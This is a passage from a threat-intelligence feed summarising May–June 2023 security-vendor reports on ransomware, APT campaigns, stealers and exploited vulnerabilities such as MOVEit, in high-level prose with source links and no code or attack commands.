- Cyble researchers have discovered an ongoing campaign associated with the notorious ransomware group LockBit. It has once again embraced the approach of disseminating malware through malicious document files targeting Korean individuals. Notably, the group utilized the same template injection techniques to deliver their payload.
Source:
https://blog.cyble.com/2023/06/06/lockbit-ransomware-2-0-resurfaces/
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Examination_of_TargetCompany_Ransomware
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- TrendMicro researchers have identified that the threat actors behind TargetCompany ransomware change the encryption algorithm and the decryptor characteristics with each major update of the ransomware. These changes are accompanied by a change in file name extensions, hence the evolution of the names by which the ransomware group is known.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyberespionage_Against_Ukrainian_State_Bodies_and_Media
- Date of Scan:
- 2023-06-06
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified that files (.HTA, .EXE, .RAR, .LNK) are being distributed by unknown persons via e-mail and instant messengers; launching them leads to the victim’s computer being infected with the LONEPAGE malicious program.
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_Social_Engineering_Campaign_Aims_to_Steal_Credentials_and_Gather_Strategic_Intelligence
- Date of Scan:
- 2023-06-06
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have tracked a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.
—
- Intel Source:
- Akamai
- Intel Name:
- Hackers_Take_Over_Legitimate_Sites_to_Host_Credit_Card_Stealer_Scripts
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- Akamai researchers have observed a new Magecart credit card stealing campaign that hijacks legitimate sites to act as “makeshift” command and control (C2) servers to inject and hide the skimmers on targeted eCommerce sites.
Source:
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
—
- Intel Source:
- Splunk
- Intel Name:
- Detection_and_Analysis_of_RedLine_Stealer
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- RedLine Stealer is a malware strain designed to steal sensitive information from compromised systems. It is typically distributed through phishing emails, social engineering tactics, and malicious URL links.
—
- Intel Source:
- Huntress
- Intel Name:
- MOVEit_Transfer_Critical_Vulnerability
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- Researchers from Huntress have investigated the exploitation of the critical MOVEit Transfer vulnerability CVE-2023-34362.
Source:
https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
—
- Intel Source:
- Perception Point
- Intel Name:
- Diving_Deep_into_Red_Deer
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- Researchers from Perception Point have deeply analyzed a malware campaign crafted specifically for the Israeli audience called Red Deer.
Source:
https://perception-point.io/blog/operation-red-deer/
—
- Intel Source:
- VMware
- Intel Name:
- Detection_of_Carbon_Black_TrueBot_Malware
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- VMware’s Carbon Black Managed Detection and Response (MDR) team began seeing a surge of TrueBot activity. TrueBot is under active development by Silence, with recent versions using a Netwrix vulnerability for delivery.
Source:
https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html
—
- Intel Source:
- Esentire
- Intel Name:
- Return_of_GuLoader_VBScript_Variant_with_PowerShell_Updates
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- GuLoader is a sophisticated malware loader which has heavily abused tax-themed lures. TRU reported on ongoing GuLoader activity using tax-themed lures and decoy files, and identified an updated VBScript GuLoader variant across multiple customers.
Source:
https://www.esentire.com/blog/guloader-vbscript-variant-returns-with-powershell-updates
—
- Intel Source:
- Menlo Security
- Intel Name:
- Analysis_of_XeGroups_Attack_Techniques_Detected
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- XeGroup’s tactics, techniques, and procedures have been detailed in a report by Volexity, which suggests that the group may be associated with other cybercriminal organizations and may have links to state-sponsored hacking groups.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Chinese_Hackers_Using_Modified_Cobalt_Strike_Variant_to_Attack_Taiwanese_Critical_Infrastructure
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have identified a malicious web server, very likely operated by a Chinese threat actor, used to target Taiwanese government entities, including critical infrastructure.
—
- Intel Source:
- Symantec
- Intel Name:
- Lancefly_APT_Targets_Governments_Aviation_and_Organizations_with_Custom_Backdoors
- Date of Scan:
- 2023-06-03
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified that the Lancefly APT group has been using custom backdoors for several years to target organizations in South and Southeast Asia.
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Camaro_Dragon_Strikes_with_a_New_TinyNote_Backdoor
- Date of Scan:
- 2023-06-03
- Impact:
- LOW
- Summary:
- Checkpoint researchers have observed that a Chinese nation-state group known as Camaro Dragon has been linked to yet another backdoor that’s designed to meet its intelligence-gathering goals.
Source:
https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Operation_Magalenha
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- SentinelLabs has been tracking a campaign over the first quarter of 2023 targeting users of Portuguese financial institutions, including government, government-backed, and private institutions.
—
- Intel Source:
- Talos
- Intel Name:
- New_unidentified_botnet_campaign_Horabot
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- Cisco Talos researchers have identified a previously unidentified botnet program, which Talos is calling “Horabot,” that delivers a known banking trojan and spam tool onto victim machines in a campaign.
Source:
https://blog.talosintelligence.com/new-horabot-targets-americas/
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Who_and_What_Threatens_the_World_Column_exe_malware
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- The ReversingLabs research team has identified a novel attack on PyPI using compiled Python code to evade detection, possibly the first attack to take advantage of PYC file direct execution.
—
- Intel Source:
- Securelist
- Intel Name:
- Previously_unknown_malware_attacked_IOS_devices
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- While monitoring the network traffic of the Securelist corporate Wi-Fi network, the researchers observed suspicious activity that originated from several iOS-based phones. Because it was impossible to inspect modern iOS devices from the inside, the researchers created offline backups of the devices in question, inspected them using the Mobile Verification Toolkit’s mvt-ios, and discovered traces of compromise. They called this campaign “Operation Triangulation”.
Source:
https://securelist.com/operation-triangulation/109842/
—
- Intel Source:
- Cyble
- Intel Name:
- SharpPanda_APT_Campaign_Expands
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- Cyble researchers observed an ongoing campaign by SharpPanda APT. This APT group has a history of targeting government officials, particularly in Southeast Asian countries. This latest campaign specifically targets high-level government officials from G20 nations.
Source:
https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/
—
- Intel Source:
- Blackberry
- Intel Name:
- Operation_CMDStealer
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- BlackBerry researchers have identified an unknown financially motivated threat actor, very likely from Brazil, that is targeting Spanish- and Portuguese-speaking victims with the goal of stealing online banking access. The victims are primarily in Portugal, Mexico, and Peru. This threat actor employs tactics such as LOLBaS (Living Off the Land Binaries and Scripts), along with CMD-based scripts, to carry out its malicious activities.
Source:
https://blogs.blackberry.com/en/2023/05/cmdstealer-targets-portugal-peru-and-mexico
—
- Intel Source:
- Cleafy
- Intel Name:
- The_deeper_techniques_of_sLoad_Ramnit_and_drIBAN
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Cleafy analysts shared in their blog the deeper techniques that led them to connect the sLoad, Ramnit, and drIBAN malware families. The analysts described some Ramnit characteristics and the techniques used to perform the MiTB attack and deliver its injection kit.
Source:
https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter-2
—
- Intel Source:
- ISC. SANS
- Intel Name:
- The_attacks_against_Apache_NiFi
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- On May 19th, ISC SANS analyst Johannes Ullrich noted a rapid increase in requests targeting Apache NiFi (diary: “Attacks Against Apache NiFi”). Apache NiFi describes itself as “an easy-to-use, powerful, and reliable system to process and distribute data.” One actor is certainly scanning the Internet for unprotected instances of Apache NiFi. That threat actor adds processors in Apache NiFi to install a crypto coin miner and then performs lateral movement by searching the server for SSH credentials.
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_Malware_Disguised_as_Hancom_Office_Document_File_Detected
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware disguised as Hancom Office document files. The malware that is being distributed is named “Who and What Threatens the World (Column).exe” and is designed to deceive users by using an icon that is similar to that of Hancom Office.
—
- Intel Source:
- Eclypsium
- Intel Name:
- Gigabyte_App_Center_Backdoor_risk
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Recently, the Eclypsium platform observed suspicious backdoor behavior inside Gigabyte systems. Their detectors flagged new, previously unknown supply chain threats, where legitimate third-party technology products or updates have been compromised. The Eclypsium analysis discovered that firmware in Gigabyte systems is dropping and executing a Windows native executable file during the system startup process, and this executable then downloads and executes additional payloads insecurely. It uses the same techniques as other OEM backdoor-like features, such as the Computrace backdoor (a.k.a. LoJack DoubleAgent) abused by threat actors, and even firmware implants such as Sednit LoJax, MosaicRegressor, and Vector-EDK.
Source:
https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/
—
- Intel Source:
- AT&T
- Intel Name:
- A_new_Quasar_variant_SeroXen_RAT
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- AT&T Alien Labs researchers reviewed recent malicious samples of a new Quasar variant observed by Alien Labs in the wild, SeroXen. This new RAT is a modified branch of the open-source version, adding some features to the original RAT.
Source:
https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_connections_between_BlackSuit_and_Royal_ransomware
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro analyzed BlackSuit ransomware and how it compares to Royal ransomware. Several researchers on Twitter discovered a new ransomware family called BlackSuit that targeted both Windows and Linux users. Some Twitter posts also mentioned connections between BlackSuit and Royal, which triggered TrendMicro researchers’ interest. TrendMicro researchers shared in their blog their analysis of a Windows 32-bit sample of the ransomware from Twitter.
—
- Intel Source:
- ISC. SANS
- Intel Name:
- DocuSign_email_opens_to_script_based_infection
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- Twitter user @0xToxin has recently discovered malicious emails imitating DocuSign with HTML attachments.
—
- Intel Source:
- Intezer
- Intel Name:
- CryptoClippy_actively_expanding_its_capabilities
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- Intezer analysts shared the details of the indication that the threat actors behind CryptoClippy are actively expanding its capabilities, now targeting a broader range of payment services commonly used in Brazil.
Source:
https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- AceCryptor_cryptor_operation
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- ESET researchers shared details about a widespread cryptor, operating as a cryptor-as-a-service used by tens of malware families.
Source:
https://www.welivesecurity.com/2023/05/25/shedding-light-acecryptor-operation/
—
- Intel Source:
- Inky
- Intel Name:
- ChatGPT_sophisticated_Phishing_Scam
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- Inky researchers observed that cybercriminals have begun impersonating the ChatGPT brand in a sophisticated, personalized phishing campaign, with the impersonation fueling a clever phishing scam.
Source:
https://www.inky.com/en/blog/fresh-phish-chatgpt-impersonation-fuels-a-clever-phishing-scam
—
- Intel Source:
- Cyble
- Intel Name:
- The_Invicta_Stealer_Spreading
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- The Cyble Research Labs team discovered a new stealer called Invicta Stealer. The developer in charge of this malware is heavily involved on social media platforms, utilizing them to promote their information stealer and its lethal capabilities.
Source:
https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/
—
- Intel Source:
- Cyble
- Intel Name:
- Ducktail_Malware_targets_a_high_profile_accounts
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Cyble researchers recently discovered Ducktail malware that specifically targets Marketing and HR professionals. The malware is designed to extract browser cookies and take advantage of social media sessions to steal sensitive information from the victim’s social media account. The purpose of the malware operation is to gain control of social media business accounts with adequate access privileges. TAs then use their acquired access to run advertisements for their financial gain.
—
- Intel Source:
- NSA / Secureworks
- Intel Name:
- Chinese_APT_Group_BRONZE_SILHOUETTE_Targeting_US_Government_and_Defense_Organizations
- Date of Scan:
- 2023-05-30
- Impact:
- MEDIUM
- Summary:
- SecureWorks researchers have discovered a cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.
—
- Intel Source:
- Cyble
- Intel Name:
- Obsidian_ORB_Ransomware_Demanding_Payment_With_Gift_Cards
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Cyble researchers have come across a new and unique ransomware strain named Obsidian ORB. Extensive analysis has revealed compelling evidence that suggests a significant correlation between Obsidian ORB Ransomware and the underlying source code of the notorious Chaos ransomware.
Source:
https://blog.cyble.com/2023/05/25/obsidian-orb-ransomware-demands-gift-cards-as-payment/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Hackers_Targeting_Users_of_Portuguese_Financial_Institutions
- Date of Scan:
- 2023-05-29
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group. The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain.
—
- Intel Source:
- CADO Security
- Intel Name:
- Legion_Malware_Targeting_SSH_Servers_and_AWS_Credentials
- Date of Scan:
- 2023-05-29
- Impact:
- LOW
- Summary:
- CADO Security researchers have identified an updated version of the commodity malware called Legion that comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.
Source:
https://www.cadosecurity.com/updates-to-legion-a-cloud-credential-harvester-and-smtp-hijacker/
—
- Intel Source:
- Trustwave
- Intel Name:
- Phishing_Delivering_via_Encrypted_Messages
- Date of Scan:
- 2023-05-28
- Impact:
- MEDIUM
- Summary:
- Trustwave researchers have observed phishing attacks that use a combination of compromised Microsoft 365 accounts and .rpmsg encrypted emails to deliver the phishing message.
—
- Intel Source:
- Cyble
- Intel Name:
- Cyber_Crime_Forum_Offers_DDoS_As_A_Service_by_Russian_Hacktivists
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) has made a significant discovery on a cybercrime forum – a newly identified malware strain called “MDBotnet.” Our analysis suggests that this malware is believed to originate from a Threat Actor (TA) linked to Russia.
Source:
https://blog.cyble.com/2023/05/23/new-mdbotnet-unleashes-ddos-attacks/
—
- Intel Source:
- Zscaler
- Intel Name:
- The_Technical_Examination_of_Pikabot
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified a new malware trojan named Pikabot, which emerged in early 2023 and consists of two components: a loader and a core module.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot
—
- Intel Source:
- Microsoft, CISA
- Intel Name:
- Volt_Typhoon_stealthy_activity
- Date of Scan:
- 2023-05-27
- Impact:
- HIGH
- Summary:
- Microsoft has discovered stealthy and malicious activity focused on credential access and network system discovery, attacking critical infrastructure organizations in the United States. The attack is carried out by Volt Typhoon, a state-sponsored actor based in China that focuses on espionage and information stealing. Microsoft is confident that this Volt Typhoon campaign is pursuing the development of capabilities that could disrupt critical communications infrastructure between the United States and the Asia region during future crises.
—
- Intel Source:
- Cyble
- Intel Name:
- Over_200_Corporate_Victims_Hit_by_New_Ransomware_Wave
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) discovered the increasing adoption of double extortion by ransomware groups is an alarming trend. We are witnessing a surge in ransomware attacks that not only encrypt valuable corporate data but also involve the threat of public exposure unless the attackers’ demands are fulfilled.
Source:
https://blog.cyble.com/2023/05/23/new-ransomware-wave-engulfs-over-200-corporate-victims/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Ongoing_Kimsuky_Campaign_Utilizing_Custom_Reconnaissance_Toolkit
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has been tracking a targeted campaign against information services, as well as organizations supporting human rights activists and defectors in relation to North Korea. The campaign focuses on file reconnaissance and exfiltrating system and hardware information, laying the groundwork for subsequent precision attacks.
Source:
https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/
—
- Intel Source:
- ClearSky
- Intel Name:
- Israeli_Logistics_Industry_targeted_by_hackers
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- ClearSky Cyber Security researchers have discovered a watering hole attack on at least eight Israeli websites. The attack was most likely orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The infected sites collect preliminary user information through a script.
—
- Intel Source:
- ASEC
- Intel Name:
- Link_Found_Between_Korean_VPN_Installations_and_MeshAgent_Infections
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has previously covered the case where SparkRAT was distributed contained within a Korean VPN’s installer in the post, “SparkRAT Being Distributed Within a Korean VPN Installer”[1]. This VPN was commonly installed by Chinese users who required better access to the Internet, and the problem was addressed after the blog post was uploaded.
—
- Intel Source:
- Cluster25
- Intel Name:
- Return_of_BlackByte_Ransomware_with_New_Technology_Version
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- The Cluster25 Threat Intel Team has identified that BlackByte is a Ransomware-as-a-Service group known for the use of the homonymous malware, which is constantly updated and spread in different variants. The team used the above function in an IDAPython script that allowed them to retrieve all invocations of the functions responsible for the dynamic loading of the APIs, in order to continue with the static analysis of the malware.
Source:
https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt
—
- Intel Source:
- Cofense
- Intel Name:
- Resurgence_of_Vacation_Request_Phishing_Emails_in_Summer_Time_Scams
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign where the threat actor sent an email to a user that claimed to be from the HR Department and provided the user with a link to submit their annual leave requests.
Source:
https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
—
- Intel Source:
- ClearSky
- Intel Name:
- Israeli_Logistics_Industry_attacked_by_hackers
- Date of Scan:
- 2023-05-27
- Impact:
- LOW
- Summary:
- ClearSky Cyber Security researchers have discovered a watering hole attack on at least eight Israeli websites. The attack was most likely orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The infected sites collect preliminary user information through a script.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Agrius_threat_actor_attacks_against_Israel
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- Agrius, a threat actor believed to be Iranian, keeps attacking Israeli targets, hiding its destructive impact behind ransomware attacks. Recently the group deployed Moneybird, a new ransomware written in C++. Despite presenting itself under a new group name, Moneybird, this is yet another Agrius alias.
—
- Intel Source:
- Mandiant
- Intel Name:
- COSMICENERGY_new_OT_Malware_related_to_Russia
- Date of Scan:
- 2023-05-27
- Impact:
- MEDIUM
- Summary:
- Mandiant discovered a new operational technology (OT) / industrial control system (ICS) malware, named COSMICENERGY, uploaded by a threat actor in Russia. The malware is capable of causing electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia.
Source:
https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response
—
- Intel Source:
- Checkpoint
- Intel Name:
- Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails_Detected
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- Checkpoint researchers have identified that malware developers strive to create new threats that can bypass the defenses of antivirus products. “Packing” and “crypting” services are specifically designed to resist analysis. GuLoader is one of the most prominent services cybercriminals use to evade antivirus detection.
Source:
https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_DarkCloud_Infostealer_Through_Spam_Emails
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the DarkCloud malware is distributed via spam email. It is an Infostealer that steals account credentials saved on infected systems, and the threat actor installed ClipBanker alongside DarkCloud.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Espionage_Activity_UAC_0063
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- CERT-UA researchers have observed that on 04/18/2023 and 04/20/2023, e-mails were sent to the department’s e-mail address from the official mailbox of the Embassy of Tajikistan in Ukraine (probably as a result of the latter being compromised); the first contained an attachment in the form of a document with a macro, and the second a reference to the same document.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Group_Targeting_Windows_IIS_Web_Servers
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that the Lazarus group, which is known to receive state-level support, is carrying out attacks against Windows IIS web servers.
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_Software
- Date of Scan:
- 2023-05-26
- Impact:
- MEDIUM
- Summary:
- Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.
—
- Intel Source:
- Securelist
- Intel Name:
- Diving_Deep_into_GoldenJackal_APT_Group
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- Securelist researchers have monitored the GoldenJackal APT Group since mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo, and JackalScreenWatcher.
Source:
https://securelist.com/goldenjackal-apt-group/109677/
—
- Intel Source:
- ASEC
- Intel Name:
- StrelaStealer_Malware_Targeting_Spanish_Users
- Date of Scan:
- 2023-05-26
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the StrelaStealer Infostealer is distributed to Spanish users. It was initially discovered around November 2022 and distributed as an attachment to spam emails.
—
- Intel Source:
- Fortinet
- Intel Name:
- Middle_East_Targeted_by_New_Kernel_Driver_Exploit
- Date of Scan:
- 2023-05-24
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered suspicious executables that make use of open-source tools and frameworks. One of the things that we keep an eye out for is tools that use the Donut project. Donut is a position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters.
Source:
https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_Signed_Kernel_Driver_Deployed_BlackCat_Ransomware
- Date of Scan:
- 2023-05-22
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have analyzed the BlackCat ransomware incident that occurred in February 2023, where they observed a new capability, mainly used for the defense evasion phase, that overlaps with the earlier malicious drivers disclosed by the three vendors.
—
- Intel Source:
- Wordfence
- Intel Name:
- Hackers_Targeting_Vulnerable_WordPress_Elementor_plugin_Versions
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Wordfence researchers have identified that several versions of the WordPress plugin Essential Addons for Elementor impacted by the now-addressed critical CVE-2023-32243 vulnerability are being actively scanned and targeted by threat actors following the release of a proof-of-concept exploit.
—
- Intel Source:
- DFIR Report
- Intel Name:
- IcedID_Macro_Ends_in_Nokoyawa_Ransomware
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Researchers from DFIR Report have identified an incident taking place during Q4 of 2022 consisting of threat actors targeting Italian organizations with Excel maldocs that deploy IcedID. The threat actors deploying such a campaign may hope to target organizations who have not updated their Microsoft Office deployments after the newly released patches to block macros on documents downloaded from the internet.
Source:
https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/
—
- Intel Source:
- Esentire
- Intel Name:
- BatLoader_Campaign_Impersonates_ChatGPT_and_Midjourney_to_Deliver_Redline_Stealer
- Date of Scan:
- 2023-05-22
- Impact:
- LOW
- Summary:
- Esentire researchers have observed that threat actors are using BatLoader in the form of MSIX Windows App Installer files to deliver the Redline Stealer.
Source:
https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks
—
- Intel Source:
- Bushidotoken
- Intel Name:
- Distributing_DarkCrystal_RAT_by_fake_Desktop_Authenticator_App
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The BushidoToken researcher recently discovered a threat actor campaign that is using fake websites to distribute malware. This TTP seems to be on the rise. A suspected Russia-based threat actor tried to duplicate the website of a legitimate open-source desktop app called Steam Desktop Authenticator, which is simply a convenient desktop version of the mobile authenticator app.
Source:
https://blog.bushidotoken.net/2023/05/fake-steam-desktop-authenticator-app.html
—
- Intel Source:
- Cyble
- Intel Name:
- AndoryuBot_s_DDOS_wild_behavior
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The Cyble group observed active exploitation of CVE-2023-25717 and deployment of AndoryuBot. This incident indicates that Threat Actors are actively looking for vulnerable Ruckus assets for exploitation purposes. AndoryuBot is a new Botnet malware sold on Telegram on a subscription basis. The deployment of such malware by TAs allows them to orchestrate large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic.
Source:
https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/
—
- Intel Source:
- Reversing Labs
- Intel Name:
- TurkoRat_found_hiding_in_the_npm_package
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- ReversingLabs researchers found two malicious packages that contained TurkoRat, an open source infostealer that lurked on npm for two months before being detected.
Source:
https://www.reversinglabs.com/blog/rats-found-hiding-in-the-npm-attic
—
- Intel Source:
- Cyble
- Intel Name:
- CapCut_s_Video_to_Deliver_Multiple_Stealers
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- Cyble researchers recently discovered a couple of phishing websites disguised as video editing software. These fake sites lure users into downloading and executing various types of malware families such as stealers, RATs, etc. In these campaigns, threat actors targeted the CapCut video editing tool, a product of ByteDance, the same parent company that owns TikTok.
Source:
https://blog.cyble.com/2023/05/19/capcut-users-under-fire/
—
- Intel Source:
- Sophos
- Intel Name:
- Brute_Ratel_remains_rare_and_targeted
- Date of Scan:
- 2023-05-19
- Impact:
- LOW
- Summary:
- The commercial attack tool’s use by threat actors has faded after an initial flurry, while Cobalt Strike remains the go-to post-exploitation tool for many.
Source:
https://news.sophos.com/en-us/2023/05/18/the-phantom-menace-brute-ratel-remains-rare-and-targeted/
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_analysis_of_QakBot_Infrastructure
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- Team Cymru shared their analysis of QakBot, which is full of various hypotheses being identified and tested. Their key findings are that QakBot C2 servers are not separated by affiliate ID; that QakBot C2 servers from older configurations continue to communicate with upstream C2 servers months after being used in campaigns; and the identification of three upstream C2 servers located in Russia, two of which behave similarly based on network telemetry patterns and the geolocations of the bot C2s communicating with them.
Source:
https://www.team-cymru.com/post/visualizing-qakbot-infrastructure
—
- Intel Source:
- Wordfence
- Intel Name:
- The_exploitation_of_critical_vulnerability_CVE_2023_32243
- Date of Scan:
- 2023-05-18
- Impact:
- HIGH
- Summary:
- Recently, Essential Addons for Elementor, a WordPress plugin, released a patch for a critical vulnerability that allows any unauthenticated user to reset arbitrary user passwords, including those of accounts with administrative-level access. This vulnerability was discovered and responsibly disclosed by security researcher Rafie Muhammed.
—
- Intel Source:
- Cyble
- Intel Name:
- BlackSuit_Ransomware_targets_VMware_ESXi_servers
- Date of Scan:
- 2023-05-18
- Impact:
- HIGH
- Summary:
- Cyble Labs researchers observed an increase in the number of ransomware groups, such as Cylance and Royal ransomware. The widespread use of Linux makes it an appealing target for ransomware groups, as a single attack can potentially compromise numerous systems.
Source:
https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/
—
- Intel Source:
- ASEC
- Intel Name:
- The_Korean_VPN_installer_is_being_used_to_distribute_SparkRAT
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency response Center (ASEC) has recently discovered SparkRAT being distributed within the installer of a certain VPN program. SparkRAT is a Remote Administration Tool (RAT) developed in Go. When installed on a user’s system, it can perform a variety of malicious behaviors, such as executing commands remotely, controlling files and processes, downloading additional payloads, and collecting information from the infected system, for example by taking screenshots.
—
- Intel Source:
- Cofense
- Intel Name:
- The_attackers_used_email_security_providers_for_spreading_phishing_attacks
- Date of Scan:
- 2023-05-18
- Impact:
- LOW
- Summary:
- Threat actors increasingly send malicious URLs within HTML attachments, which makes it more challenging for Secure Email Gateways (SEGs) to block them. The Phishing Defense Center analyzed a phishing campaign impersonating an email security provider to trick recipients into providing their user credentials via a malicious HTML attachment.
—
- Intel Source:
- CISA
- Intel Name:
- Joint_Cybersecurity_Advisory_on_BianLian_Ransomware_Group
- Date of Scan:
- 2023-05-18
- Impact:
- MEDIUM
- Summary:
